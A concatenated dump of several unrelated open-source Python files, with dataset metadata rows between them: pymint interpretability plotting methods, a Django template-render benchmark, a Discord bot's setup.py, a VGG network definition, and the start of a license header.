>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> pd = explainer.calc_pd(features='all')
>>> # Provide a small subset of features to plot
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez',
... 'tmp2m_hrs_bl_frez','uplwav_flux']
>>> explainer.plot_pd(pd, features=important_vars)
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
if pd.attrs['estimator_output'] == 'probability':
to_probability=True
if to_probability:
kwargs['left_yaxis_label'] = 'Centered PD (%)'
else:
kwargs['left_yaxis_label'] = 'Centered PD'
return self._plot_interpret_curves(
method='pd',
data=pd,
features=features,
estimator_names=estimator_names,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability=to_probability,
line_colors=line_colors,
**kwargs)
def plot_ale(self, ale=None, features=None, estimator_names=None,
display_feature_names={}, display_units={},
line_colors=None, to_probability=False, **kwargs):
"""
Runs the 1D and 2D accumulated local effects plotting.
Parameters
----------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale` for
``features``.
features : string, list of strings, list of 2-tuple of strings
Features to plot the PD for. To plot for 2D PD,
pass a list of 2-tuples of features.
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to plot for.
display_feature_names : dict
For plotting purposes. Dictionary that maps the feature names
in the pandas.DataFrame to display-friendly versions.
E.g., ``display_feature_names = { 'dwpt2m' : '$T_{d}$', }``
The plotting code can handle latex-style formatting.
display_units : dict
For plotting purposes. Dictionary that maps the feature names
to their units.
E.g., ``display_units = { 'dwpt2m' : '$^\circ$C', }``
line_colors : str or list of strs of len(estimators)
User-defined colors for curve plotting.
to_probability : boolean
If True, the values are multipled by 100.
Keyword arguments include arguments typically used for matplotlib.
E.g.,
figsize, hist_color,
Returns
--------
fig, axes: matplotlib figure instance and the corresponding axes
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all')
>>> # Provide a small subset of features to plot
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez',
... 'tmp2m_hrs_bl_frez','uplwav_flux']
>>> explainer.plot_ale(ale, features=important_vars)
.. image :: ../../images/ale_1d.png
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
if ale.attrs['estimator_output'] == 'probability':
to_probability=True
if to_probability:
kwargs['left_yaxis_label'] = 'Centered ALE (%)'
else:
kwargs['left_yaxis_label'] = 'Centered ALE'
return self._plot_interpret_curves(
method = 'ale',
data=ale,
features=features,
estimator_names=estimator_names,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability=to_probability,
line_colors=line_colors,
**kwargs)
def local_contributions(self,
method='shap',
background_dataset=None,
performance_based=False,
n_samples=100 ):
"""
Computes the individual feature contributions to a predicted outcome for
a series of examples either based on tree interpreter (only Tree-based methods)
or Shapley Additive Explanations.
Parameters
-----------
method : ``'shap'`` or ``'tree_interpreter'``
Can use SHAP or treeinterpreter to compute the feature contributions.
SHAP is estimator-agnostic while treeinterpreter can only be used on
select decision-tree based estimators in scikit-learn. SHAP will attempt
to first use the Tree-based explainer and if that fails, then the
Kernel-based explainer.
background_dataset : array of shape (n_samples, n_features)
A representative (often a K-means or random sample) subset of the
data used to train the ML estimator. Used for the background dataset
to compute the expected values for the SHAP calculations.
Only required for non-tree based estimators.
performance_based : boolean (default=False)
If True, will average feature contributions over the best and worst
performing of the given X. The number of examples to average over
is given by n_samples
n_samples : interger (default=100)
Number of samples to compute average over if performance_based = True
Returns
--------
results_df : nested pandas.DataFrame
For each example, contributions from each feature plus the bias
The dataframe is nested by the estimator names and additional keys
if performance_based=True.
Examples
---------
>>> import pymint
>>> import shap
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> # Only give the X you want contributions for.
>>> # In this case, we are using a single example.
>>> single_example = X.iloc[[0]]
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=single_example,
... )
>>> # Create a background dataset; randomly sample 100 X
>>> background_dataset = shap.sample(X, 100)
>>> contrib_ds = explainer.local_contributions(method='shap',
... background_dataset=background_dataset)
>>> # For the performance-based contributions,
>>> # provide the full set of X and y values.
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> contrib_ds = explainer.local_contributions(method='shap',
... background_dataset=background_dataset,
... performance_based=True, n_samples=100)
"""
results_df = self.local_obj._get_local_prediction(method=method,
background_dataset=background_dataset,
performance_based=performance_based,
n_samples=n_samples,)
# Add metadata
self.attrs_dict['method'] = method
self.attrs_dict['n_samples'] = n_samples
self.attrs_dict['performance_based'] = str(performance_based)
self.attrs_dict['feature_names'] = self.feature_names
results_df = self._append_attributes(results_df)
return results_df
def plot_contributions(self,
                       contrib=None,
                       features=None,
                       estimator_names=None,
                       display_feature_names=None,
                       **kwargs):
    """
    Plot the feature contributions computed by
    :func:`~InterpretToolkit.local_contributions`.

    Parameters
    ----------
    contrib : nested pandas.DataFrame
        Results of :func:`~InterpretToolkit.local_contributions`. The frame
        is nested by estimator name (and by performance keys when the
        contributions were computed with ``performance_based=True``).
    features : str or list of str, optional
        Features to plot. If None, all features are eligible; the plotting
        routine caps how many are shown (see its ``n_vars`` keyword).
    estimator_names : str or list of str, optional
        Estimator name(s) to plot. If None, every estimator recorded in
        ``contrib.attrs['estimators used']`` is plotted.
    display_feature_names : dict, optional
        Maps raw feature names to display-friendly (possibly LaTeX) labels,
        e.g. ``{'dwpt2m': 'T$_{d}$'}``.
    **kwargs
        Forwarded to the matplotlib-based plotting routine
        (e.g. ``base_font_size``).

    Returns
    -------
    fig : matplotlib figure instance
    """
    # Avoid the mutable-default-argument pitfall; {} means "no renaming".
    if display_feature_names is None:
        display_feature_names = {}
    if estimator_names is None:
        estimator_names = contrib.attrs['estimators used']
    elif is_str(estimator_names):
        estimator_names = [estimator_names]
    if features is None:
        features = contrib.attrs['feature_names']
    # A single panel is drawn only for non-performance-based contributions
    # of a single estimator; it gets a larger base font size.
    only_one_panel = (contrib.index[0][0] == 'non_performance'
                      and len(estimator_names) == 1)
    base_font_size = kwargs.get('base_font_size', 16 if only_one_panel else 11)
    plot_obj = PlotFeatureContributions(BASE_FONT_SIZE=base_font_size)
    # NOTE: a dead read of contrib.attrs['estimator_output'] was removed;
    # the plotting routine receives the toolkit-level setting below.
    kwargs['estimator_output'] = self.estimator_output
    return plot_obj.plot_contributions(data=contrib,
                                       estimator_names=estimator_names,
                                       features=features,
                                       display_feature_names=display_feature_names,
                                       **kwargs)
def shap(self, background_dataset=None):
    """
    Compute SHapley Additive Explanations (SHAP) values for every estimator.

    Tree-based estimators use the Tree explainer; anything else falls back
    to the Kernel explainer, which requires a background dataset.

    Parameters
    ----------
    background_dataset : array of shape (n_samples, n_features), optional
        Representative subset (often a K-means or random sample) of the
        training data, used to compute expected values for the SHAP
        calculations. Only required for non-tree based estimators.

    Returns
    -------
    dict
        Maps each estimator name to a ``(shap_values, bias)`` tuple, where
        ``shap_values`` is a numpy array of shape (n_samples, n_features)
        and ``bias`` has shape (1, n_features).
    """
    self.local_obj.background_dataset = background_dataset

    def _explain(estimator):
        # Unpack and repack so the stored value is always a 2-tuple.
        values, bias = self.local_obj._get_shap_values(estimator=estimator,
                                                       X=self.X)
        return values, bias

    return {name: _explain(est) for name, est in self.estimators.items()}
def plot_shap(self,
              plot_type='summary',
              shap_values=None,
              features=None,
              display_feature_names=None,
              display_units=None,
              **kwargs):
    """
    Plot SHapley Additive Explanations (SHAP) results as either a summary
    (feature-importance style) plot or dependence (partial-dependence style)
    plots for selected features.

    Parameters
    ----------
    plot_type : ``'summary'`` or ``'dependence'``
        'summary' draws a feature-importance style plot; 'dependence'
        draws per-feature partial-dependence style panels.
    shap_values : array of shape (n_samples, n_features)
        SHAP values, e.g. from :func:`~InterpretToolkit.shap`.
    features : str or list of str, optional
        Features to plot when ``plot_type='dependence'``.
    display_feature_names : dict, optional
        Maps feature names to display-friendly (possibly LaTeX) labels.
    display_units : dict, optional
        Maps feature names to their units, e.g. ``{'dwpt2m': '$^\\circ$C'}``.
    **kwargs
        Forwarded to the plotting routine (e.g. ``base_font_size``).

    Returns
    -------
    The value returned by the underlying plotting routine.
    """
    # Avoid mutable default arguments.
    if display_feature_names is None:
        display_feature_names = {}
    if display_units is None:
        display_units = {}
    # Probability outputs are scaled to percentage points for readability;
    # work on a copy so the caller's array is left untouched.
    to_probability = self.estimator_output == 'probability'
    if to_probability:
        shap_values_copy = np.copy(shap_values)
        shap_values_copy *= 100.
    else:
        shap_values_copy = shap_values
    if plot_type == 'summary':
        fontsize = 12
    else:
        # Dependence grids with many panels get a larger base font; guard
        # against features=None (previously a TypeError).
        fontsize = 12 if features is not None and len(features) <= 6 else 16
    base_font_size = kwargs.get('base_font_size', fontsize)
    plot_obj = PlotFeatureContributions(BASE_FONT_SIZE=base_font_size)
    plot_obj.feature_names = self.feature_names
    # Return the plot object's result for consistency with the other
    # plot_* methods (the original discarded it).
    return plot_obj.plot_shap(shap_values=shap_values_copy,
                              X=self.X,
                              features=features,
                              plot_type=plot_type,
                              display_feature_names=display_feature_names,
                              display_units=display_units,
                              **kwargs
                              )
def plot_importance(self,
                    data,
                    panels,
                    plot_correlated_features=False,
                    **kwargs):
    """
    Plot permutation importance and other ranking-based results.

    Parameters
    ----------
    panels : list of 2-tuples
        Determines the sub-panel matrixing of the plot. The docstring
        example uses (estimator name, method) ordering::

            panels = [('Random Forest', 'multipass'), ('Random Forest', 'singlepass')]

        NOTE(review): the code below unpacks each tuple as
        ``(method, estimator_name)`` — the opposite order of this example.
        Confirm the intended ordering against the callers/tests.
        Available ranking methods in PyMint include 'multipass',
        'singlepass', 'perm_based', 'ale_variance', and
        'ale_variance_interactions'.
    data : xarray.Dataset or list of xarray.Datasets
        Results from
        - :func:`~InterpretToolkit.permutation_importance`
        - :func:`~InterpretToolkit.ale_variance`
        - :func:`~InterpretToolkit.friedman_h_stat`
        - :func:`~InterpretToolkit.perm_based_interaction`
        For each element in panels, there needs to be a corresponding
        element in data (a single dataset is broadcast; see below).
    plot_correlated_features : bool
        If True, pairs of features with a linear correlation coefficient
        > 0.8 are annotated/paired by bars or color-coding — useful for
        spotting spurious rankings caused by correlated features.
    kwargs : keyword arguments
        num_vars_to_plot : int
            Number of features to plot from the importance calculation.

    Returns
    -------
    fig : matplotlib figure instance
    """
    if is_list(data):
        assert len(data) == len(panels), 'Panels and Data must have the same number of elements'
    else:
        # A single dataset was given; wrap it so it can be broadcast.
        data = [data]
    if len(data) != len(panels):
        # Assuming that data contains multiple models.
        # Validate that every requested estimator actually appears in the
        # dataset's "*rankings__<estimator>" variables before broadcasting.
        given_estimator_names = [m[1] for m in panels]
        available_estimators = [f.split('rankings__')[1] for f in list(data[0].data_vars) if 'rank' in f]
        missing = np.array([True if f not in available_estimators else False for f in given_estimator_names])
        missing_estimators = list(np.array(given_estimator_names)[missing])
        if any(missing):
            txt = ''
            for i in missing_estimators:
                txt += (i + ', ')
            raise ValueError (f"""Results for {txt} are not in the given dataset.
                Check for possible spelling errors""")
        # Replicate the single dataset so zip() below pairs it with every panel.
        data *= len(panels)
    # Verify each panel's method exists in its paired dataset.
    for r, (method, estimator_name) in zip(data, panels):
        available_methods = [d.split('__')[0] for d in list(r.data_vars) if f'rankings__{estimator_name}' in d]
        if f"{method}_rankings"not in available_methods:
            raise ValueError(f"""{method} does not match the available methods for this item({available_methods}).
                             Ensure that the elements of data match up with those panels!
                             Also check for any possible spelling error.
                             """)
    # An explicit estimator_output kwarg overrides the toolkit-level value;
    # pop it so it is not passed through twice.
    estimator_output = kwargs.get('estimator_output', self.estimator_output)
    kwargs.pop('estimator_output', None)
    # initialize a plotting object
    base_font_size = kwargs.get('base_font_size', 12)
    plot_obj = PlotImportance(BASE_FONT_SIZE=base_font_size)
    if plot_correlated_features:
        # The raw training data is needed to compute feature correlations.
        kwargs['X'] = self.X
    return plot_obj.plot_variable_importance(data,
                                             panels=panels,
                                             plot_correlated_features=plot_correlated_features,
                                             estimator_output=estimator_output,
                                             **kwargs)
def plot_box_and_whisker(self, important_vars, example,
                         display_feature_names={}, display_units={}, **kwargs):
    """
    Draw the training-data distribution of the given features as
    box-and-whisker plots and overlay a single example on top of them.
    Useful for real-time explainability.

    Parameters
    ----------
    important_vars : str or list of str
        Feature(s) to plot.
    example : pandas.Series or single-row pandas.DataFrame
        The example to overlay; its columns (DataFrame) or index (Series)
        must match ``important_vars`` exactly.
    """
    if not is_list(important_vars):
        important_vars = [important_vars]
    # A DataFrame exposes its features as columns, a Series as its index.
    if isinstance(example, pd.DataFrame):
        example_features = example.columns
    else:
        example_features = example.index
    if set(example_features) != set(important_vars):
        raise ValueError('The example dataframe/series must have important_vars as columns!')
    return box_and_whisker(self.X,
                           top_preds=important_vars,
                           example=example,
                           display_feature_names=display_feature_names,
                           display_units=display_units,
                           **kwargs)
def plot_scatter(self, features, kde=True,
                 subsample=1.0, display_feature_names={}, display_units={}, **kwargs):
    """
    2-D scatter plot of ML model predictions. With ``kde=True``, KDE contour
    overlays mark the densest regions; for classification estimators, one
    set of contours is drawn per class.
    """
    # TODO: Handle plotting multiple models!
    # TODO: Determining if it is raw or probability (multiple classes too!)
    # if there is more than a couple classes, then only plot one kde contours
    # Reject any requested feature that is not part of the training data.
    bad_features = [f for f in features if f not in self.feature_names]
    if bad_features:
        raise ValueError(f'{bad_features} is not a valid feature. Check for possible spelling errors!')
    plotter = PlotScatter(kwargs.get('base_font_size', 12))
    return plotter.plot_scatter(self.estimators,
                                X=self.X,
                                y=self.y,
                                features=features,
                                display_feature_names=display_feature_names,
                                display_units=display_units,
                                subsample=subsample,
                                peak_val=None, kde=kde, **kwargs)
def get_important_vars(self, perm_imp_data, multipass=True, n_vars=10, combine=False):
    """
    Retrieve the top-ranked features from a permutation-importance result,
    optionally merging the rankings of several estimators into one list.

    Parameters
    ----------
    perm_imp_data : xarray.Dataset
        Permutation importance result dataset.
    multipass : bool, default True
        If True, use the multipass rankings; otherwise the singlepass ones.
    n_vars : int, default 10
        With ``combine=True``, how many top features to take per estimator
        before merging.
    combine : bool, default False
        If True, return a single merged list of top features across
        estimators; if False, return a dict keyed by estimator name.

    Returns
    -------
    dict of {estimator name: top features} when ``combine=False``,
    otherwise a single combined list of feature names.
    """
    rankings = retrieve_important_vars(perm_imp_data,
                                       estimator_names=self.estimator_names,
                                       multipass=multipass)
    if combine:
        return combine_top_features(rankings, n_vars=n_vars)
    return rankings
def load(self, fnames, dtype='dataset'):
    """
    Load results of a previous computation (permutation importance,
    calc_ale, calc_pd, etc.) and restore the estimator metadata onto this
    toolkit and its global/local helper objects.

    Parameters
    ----------
    fnames : str or list of str
        File names of dataframes or datasets to load.
    dtype : 'dataset' or 'dataframe'
        Whether the files hold xarray.Datasets or pandas.DataFrames.

    Returns
    -------
    results : xarray.Dataset or pandas.DataFrame
        Data for plotting purposes.

    Raises
    ------
    ValueError
        If ``dtype`` is not one of the two supported values.
    """
    if dtype == 'dataset':
        results = load_netcdf(fnames=fnames)
    elif dtype == 'dataframe':
        results = load_dataframe(fnames=fnames)
    else:
        raise ValueError('dtype must be "dataset" or "dataframe"!')
    for s in [self, self.global_obj, self.local_obj]:
        # Older result files stored 'model_output'/'models used' instead of
        # 'estimator_output'/'estimators used'; fall back when the modern
        # keys are missing. Catch only KeyError — the original bare
        # `except:` also swallowed unrelated errors (even KeyboardInterrupt).
        try:
            setattr(s, 'estimator_output', results.attrs['estimator_output'])
            estimator_names = [results.attrs['estimators used']]
        except KeyError:
            setattr(s, 'estimator_output', results.attrs['model_output'])
            estimator_names = [results.attrs['models used']]
        # Normalize to a flat list of names.
        if not is_list(estimator_names):
            estimator_names = [estimator_names]
        if (any(is_list(i) for i in estimator_names)):
            estimator_names = estimator_names[0]
        setattr(s, 'estimator_names', estimator_names)
        # NOTE(review): this attribute name intentionally contains a space,
        # mirroring the attrs key 'estimators used' — confirm it is read
        # back with getattr elsewhere.
        setattr(s, 'estimators used', estimator_names)
    return results
def save(self, fname, data):
    """
    Persist the results of a computation (permutation importance,
    calc_ale, calc_pd, etc.) to disk.

    Parameters
    ----------
    fname : str
        Destination file name (including path).
    data : xarray.Dataset or pandas.DataFrame
        The results of an InterpretToolkit calculation.

    Raises
    ------
    TypeError
        If ``data`` is neither a pandas.DataFrame nor an xarray.Dataset.
    """
    # Dispatch on the result type; datasets go to netCDF, frames to the
    # dataframe writer.
    if is_dataset(data):
        save_netcdf(fname=fname, ds=data)
        return
    if is_dataframe(data):
        save_dataframe(fname=fname, dframe=data)
        return
    raise TypeError(f'data is not a pandas.DataFrame or xarray.Dataset. The type is {type(data)}.')
| 43.569576 | 128 | 0.544364 |
ccb892af2b1e41f05f5e2b3b091e44e1919d2350 | 1,681 | py | Python | djangobench/benchmarks/template_render/benchmark.py | Bouke/djangobench | 94fc28d99f95c65d26d0fad8af44e46c49282220 | [
"BSD-3-Clause"
] | 3 | 2016-11-27T22:25:34.000Z | 2018-12-12T20:06:40.000Z | djangobench/benchmarks/template_render/benchmark.py | Bouke/djangobench | 94fc28d99f95c65d26d0fad8af44e46c49282220 | [
"BSD-3-Clause"
] | null | null | null | djangobench/benchmarks/template_render/benchmark.py | Bouke/djangobench | 94fc28d99f95c65d26d0fad8af44e46c49282220 | [
"BSD-3-Clause"
] | null | null | null | from django import VERSION
from django.shortcuts import render_to_response
from djangobench.utils import run_benchmark
#set up some vars
objects1 = [object(), object(), object(), object(), object()]
objects2 = [object(), object(), object(), object(), object()]
object1 = object()
object2 = object()
object3 = None
num1 = 1
num2 = 2
boolean1 = True
SCRIPT_CONTENT_URL = '/some/prefix'
WEBSITE_DOMAIN = 'http://www.somedomain.com'
SHOW_ALT_HEADER = 'True'
def benchmark_django_lte_13():
context = {
'objects1': objects1,
'objects2': objects2,
'object1': object1,
'object2': object2,
'object3': object3,
'num1' : num1,
'num2' : num2,
'boolean1': boolean1,
'SCRIPT_CONTENT_URL': SCRIPT_CONTENT_URL,
'WEBSITE_DOMAIN': WEBSITE_DOMAIN,
'SHOW_ALT_HEADER': SHOW_ALT_HEADER
}
render_to_response('permalink_django_lte_13.html', context)
def benchmark_django_gt_13():
context = {
'objects1': objects1,
'objects2': objects2,
'object1': object1,
'object2': object2,
'object3': object3,
'num1' : num1,
'num2' : num2,
'boolean1': boolean1,
'SCRIPT_CONTENT_URL': SCRIPT_CONTENT_URL,
'WEBSITE_DOMAIN': WEBSITE_DOMAIN,
'SHOW_ALT_HEADER': SHOW_ALT_HEADER
}
render_to_response('permalink.html', context)
run_benchmark(
benchmark_django_gt_13 if VERSION > (1, 3) else benchmark_django_lte_13,
syncdb = False,
meta = {
'description': ('Render a somewhat complex, fairly typical template '
'(including inheritance, reverse URL resolution, etc.).'),
}
)
| 28.982759 | 82 | 0.638905 |
aa7c54425adb83fb25e6262140bb2c969e86b364 | 791 | py | Python | setup.py | uebergucken/DECbot | fa259d47f901ca9187bff74f08e212739af7774f | [
"MIT"
] | 4 | 2019-10-22T13:34:54.000Z | 2021-06-25T11:43:33.000Z | setup.py | uebergucken/DECbot | fa259d47f901ca9187bff74f08e212739af7774f | [
"MIT"
] | 3 | 2020-11-24T03:10:47.000Z | 2021-07-03T08:54:00.000Z | setup.py | uebergucken/DECbot | fa259d47f901ca9187bff74f08e212739af7774f | [
"MIT"
] | 2 | 2021-06-25T19:42:50.000Z | 2021-06-30T08:09:30.000Z | from setuptools import setup, find_packages
setup(
name = "decbot",
version = "1.0.0",
author = 'Wyatt Lindquist',
author_email = 'git.wquist@gmail.com',
description = "a Discord bot that uses DECtalk text-to-speech",
long_description = open('./README.md').read(),
long_description_content_type = 'text/markdown',
url = 'https://github.com/wquist/DECbot',
license = 'MIT',
classifiers = [
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: Unix"
],
packages = find_packages(),
install_requires = ['discord.py', 'pydub', 'pynacl', 'pyyaml'],
entry_points = { 'console_scripts': ['decbot = decbot.__main__:main'] }
)
| 32.958333 | 76 | 0.596713 |
07fa5d844ffe981e17e8b1a976404874a4371baf | 7,858 | py | Python | continual/cnn/vgg.py | arthurdouillard/dytox | 1eebbd8cf5241ede593a5ba51a8c42284f43d1c0 | [
"Apache-2.0"
] | 31 | 2021-11-25T08:44:55.000Z | 2022-03-31T15:20:48.000Z | continual/cnn/vgg.py | arthurdouillard/dytox | 1eebbd8cf5241ede593a5ba51a8c42284f43d1c0 | [
"Apache-2.0"
] | 2 | 2022-03-25T13:06:21.000Z | 2022-03-31T08:58:34.000Z | continual/cnn/vgg.py | arthurdouillard/dytox | 1eebbd8cf5241ede593a5ba51a8c42284f43d1c0 | [
"Apache-2.0"
] | 4 | 2021-12-09T11:28:13.000Z | 2022-03-20T21:18:44.000Z | import torch
import torch.nn as nn
#from .utils import load_state_dict_from_url
from typing import Union, List, Dict, Any, cast
from continual.cnn import AbstractCNN
__all__ = [
'VGG', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn',
'vgg19_bn', 'vgg19',
]
model_urls = {
'vgg11': 'https://download.pytorch.org/models/vgg11-8a719046.pth',
'vgg13': 'https://download.pytorch.org/models/vgg13-19584684.pth',
'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth',
'vgg19': 'https://download.pytorch.org/models/vgg19-dcbb9e9d.pth',
'vgg11_bn': 'https://download.pytorch.org/models/vgg11_bn-6002323d.pth',
'vgg13_bn': 'https://download.pytorch.org/models/vgg13_bn-abd245e5.pth',
'vgg16_bn': 'https://download.pytorch.org/models/vgg16_bn-6c64b313.pth',
'vgg19_bn': 'https://download.pytorch.org/models/vgg19_bn-c79401a0.pth',
}
class VGG(AbstractCNN):
def __init__(
self,
features: nn.Module,
num_classes: int = 1000,
init_weights: bool = True
) -> None:
super(VGG, self).__init__()
self.features = features
self.avgpool = nn.AdaptiveAvgPool2d((7, 7))
self.classifier = nn.Sequential(
nn.Linear(512 * 7 * 7, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Dropout(),
)
self.head = None
self.embed_dim = 4096
if init_weights:
self._initialize_weights()
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.features(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.classifier(x)
return self.head(x)
def _initialize_weights(self) -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
def make_layers(cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential:
    """
    Build the VGG feature extractor from a layer configuration.

    Each integer entry adds a 3x3 Conv2d (optionally followed by
    BatchNorm2d) and a ReLU; each 'M' entry adds a 2x2 max-pool.
    The input is assumed to have 3 channels (RGB).
    """
    modules: List[nn.Module] = []
    channels = 3
    for entry in cfg:
        if entry == 'M':
            modules.append(nn.MaxPool2d(kernel_size=2, stride=2))
            continue
        width = cast(int, entry)
        modules.append(nn.Conv2d(channels, width, kernel_size=3, padding=1))
        if batch_norm:
            modules.append(nn.BatchNorm2d(width))
        modules.append(nn.ReLU(inplace=True))
        channels = width
    return nn.Sequential(*modules)
# Layer configurations from the VGG paper: integers are conv output widths,
# 'M' marks a 2x2 max-pool. As wired up by the factories below:
# A -> vgg11, B -> vgg13, D -> vgg16, E -> vgg19.
cfgs: Dict[str, List[Union[str, int]]] = {
    'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
    'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def _vgg(arch: str, cfg: str, batch_norm: bool, pretrained: bool, progress: bool, **kwargs: Any) -> VGG:
    # Shared factory behind the vgg* helpers below.
    if pretrained:
        # Pretrained weights make random initialization redundant.
        kwargs['init_weights'] = False
    model = VGG(make_layers(cfgs[cfg], batch_norm=batch_norm), **kwargs)
    if pretrained:
        # NOTE(review): load_state_dict_from_url is never imported in this
        # file (the import at the top is commented out), so pretrained=True
        # raises NameError as written — confirm before relying on it.
        state_dict = load_state_dict_from_url(model_urls[arch],
                                              progress=progress)
        model.load_state_dict(state_dict)
    return model
# Public factories, one per VGG depth, with and without batch normalization.
# All delegate to _vgg; see the note there about the pretrained=True path.
def vgg11(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 11-layer model (configuration "A") from
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg11', 'A', False, pretrained, progress, **kwargs)


def vgg11_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 11-layer model (configuration "A") with batch normalization
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg11_bn', 'A', True, pretrained, progress, **kwargs)


def vgg13(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 13-layer model (configuration "B")
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg13', 'B', False, pretrained, progress, **kwargs)


def vgg13_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 13-layer model (configuration "B") with batch normalization
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg13_bn', 'B', True, pretrained, progress, **kwargs)


def vgg16(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 16-layer model (configuration "D")
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg16', 'D', False, pretrained, progress, **kwargs)


def vgg16_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 16-layer model (configuration "D") with batch normalization
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg16_bn', 'D', True, pretrained, progress, **kwargs)


def vgg19(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 19-layer model (configuration "E")
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg19', 'E', False, pretrained, progress, **kwargs)


def vgg19_bn(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> VGG:
    r"""VGG 19-layer model (configuration 'E') with batch normalization
    `"Very Deep Convolutional Networks For Large-Scale Image Recognition" <https://arxiv.org/pdf/1409.1556.pdf>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    return _vgg('vgg19_bn', 'E', True, pretrained, progress, **kwargs)
fc00a50def2921734dd0d29f0825eb706eba6459 | 16,205 | py | Python | TrainingExtensions/tensorflow/src/python/aimet_tensorflow/keras/quantsim.py | aaronkjones/aimet | 08feb34573281f87c53301935652a02f8d573858 | [
"BSD-3-Clause"
] | null | null | null | TrainingExtensions/tensorflow/src/python/aimet_tensorflow/keras/quantsim.py | aaronkjones/aimet | 08feb34573281f87c53301935652a02f8d573858 | [
"BSD-3-Clause"
] | null | null | null | TrainingExtensions/tensorflow/src/python/aimet_tensorflow/keras/quantsim.py | aaronkjones/aimet | 08feb34573281f87c53301935652a02f8d573858 | [
"BSD-3-Clause"
] | null | null | null | # /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2022, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
